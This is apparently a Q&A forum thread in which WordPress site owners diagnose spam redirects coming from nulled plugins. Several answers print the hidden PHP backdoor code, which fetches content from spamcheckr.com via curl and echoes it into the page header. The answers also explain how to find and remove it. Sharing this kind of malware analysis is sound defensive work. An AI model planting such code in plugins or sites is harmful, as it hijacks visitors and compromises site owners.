WordPress blog infected with HTML Refresh meta tag

Question

Hello StackOverflow community. I have a very interesting (at my opinion) infection to share with you today.

4-5 days ago I realized that my blog\'s homepage after so

Answer 1

Found it, too. In my case I was using an apparently nulled plug-in (which I didn't realize). It's called woocommerce-checkout-field-editor and was injecting a link to a Justin Bieber youtube video.

The function looks like this and is was hidden in \wp-content\plugins\woocommerce-checkout-field-editor\assets\js\class.php:

if (mt_rand(0,99) == 1) {
function sec_check() {
    if(function_exists('curl_init'))    
    {
        $url = "spamcheckr.com/req.php";
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
        $data = curl_exec($ch);
        curl_close($ch);
        echo "$data";
    }
}
add_action('wp_head','sec_check');

}

As we can see, it only displays the spam when a random function hits '1'. Then, it politely asks to see if curl is installed and then sends a simple GET request to the spam server to see what code it should be injecting.

The site is spamcheckr.com.

It then adds itself into the WordPress header and redirects the viewer of the page.

I reported the site to their host and let's see what happens.

Answer 2

I have found this script in the wordpress fooboxV2 plugin.(FooBox) Plugin official url is http://fooplugins.com/plugins/foobox/

This is the script file path /wp-content/plugins/fooboxV2/includes/foolic_class.php

You can see whole scripts are commented.But I found this code in that commented code.

<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_hhesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_hhesk');}} ?>

Answer 3

I have the same problem and think I found the solution! Check your site files for this link: http://spamcheckr.com/l.php I found this link in formcraft plugin.

Like this:

if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}

Edited: Also check for this: http://spamcheckr.com/req.php

Answer 4

If you are using a nulled version of Gravity Forms you might also get this redirection problem. To solve the problem go to /plugins/gravityforms/settings/setting.php and remove the following code:

<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_cahesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_cahesk');}} ?>

Good luck.

Answer 5

Good answer above. To add to it, I recommend using grep to anyone who has trouble searching for the code :

grep -nr 'http://spamcheckr.com/l.php' /www/wordpress/wp-content

If you don't have grep and cant access your server (windows users) download it or use findstr :

findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content

(Dont forget to change /www/wordpress/wp-content to the location or your wordpress folders